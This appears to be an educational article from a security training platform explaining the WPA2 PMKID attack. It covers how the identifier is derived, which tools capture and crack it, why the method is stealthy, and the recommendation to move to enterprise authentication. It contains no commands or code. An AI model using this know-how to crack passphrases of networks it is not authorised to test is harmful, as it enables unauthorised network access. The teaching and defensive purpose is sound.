WPA2 PMKID Attack
Wireless attack capturing WPA2 Pairwise Master Key Identifier to enable offline passphrase cracking without client deauthentication.
Wireless attack capturing WPA2 Pairwise Master Key Identifier to enable offline passphrase cracking without client deauthentication.
Continue your mission
The WPA2 PMKID attack is a wireless exploitation technique that captures the Pairwise Master Key Identifier from a WPA2 access point without requiring a connected client or a full four-way handshake. Discovered in 2018, it significantly simplified WPA2-PSK cracking by eliminating the need to deauthenticate clients.
The PMKID is included in the first message of the WPA2 four-way handshake as part of the Robust Security Network Information Element. An attacker initiates an association request to the access point, which responds with the PMKID in the first EAPOL frame. The PMKID is calculated as HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA), where the PMK is derived from the network passphrase. The attacker captures this single frame using tools like hcxdumptool and then performs offline cracking with hashcat or similar tools. Because the PMKID contains enough information to verify passphrase guesses, the attacker can test candidates without interacting further with the network.
The PMKID attack made WPA2-PSK cracking more reliable and stealthy than previous methods. Traditional handshake capture required either waiting for a legitimate client connection or performing deauthentication attacks that could trigger wireless IDS alerts. PMKID capture requires only a single frame exchange with the access point itself, reducing detection risk. This technique reinforced that WPA2-PSK security depends entirely on passphrase complexity.
CDA covers the PMKID attack within the VSD domain as part of wireless assessment methodology. Theater missions include practical PMKID capture and cracking exercises. Our approach emphasizes that this technique demonstrates the fundamental weakness of pre-shared key authentication, driving recommendations toward WPA2/WPA3-Enterprise for organizational networks.
CDA Theater missions that address topics covered in this article.
Rogue access point detection identifies unauthorized wireless APs on the network using WIPS sensors, wired-side monitoring, and signal triangulation to prevent network bypass.
LLM security risks include data leakage, prompt injection, model supply chain attacks, and unauthorized tool execution, requiring organizations to treat AI models as high-privilege components.
Written by CDA Editorial
Found an issue? Help improve this article.